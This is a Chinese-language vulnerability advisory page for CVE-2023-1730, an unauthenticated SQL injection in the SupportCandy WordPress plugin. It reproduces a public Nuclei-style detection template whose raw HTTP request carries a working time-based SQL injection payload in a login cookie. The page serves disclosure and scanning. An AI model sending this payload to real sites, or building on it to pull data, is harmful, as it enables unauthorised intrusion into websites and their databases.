CVE-2023-1730: SupportCandy < 3.1.5 - Unauthenticated SQL Injection

日期: 2025-08-01 | 影响软件: SupportCandy | POC: 已公开

漏洞描述

The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.

PoC代码[已公开]

id: CVE-2023-1730

info:
  name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 3.1.5
  reference:
    - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
    - https://wordpress.org/plugins/supportcandy/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1730
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1730
    cwe-id: CWE-89
    epss-score: 0.77544
    epss-percentile: 0.9895
    cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: supportcandy
    product: supportcandy
    framework: wordpress
  tags: time-based-sqli,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "supportcandy")'
        condition: and
# digest: 4a0a00473045022066be61dd0590c218e1078b72afd372e805b37f9645d202e717cd471dab4491e6022100c1f7738840c3db1355af9784b4480987af738133ebf194e9c5bbc3f7e8a43dc7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐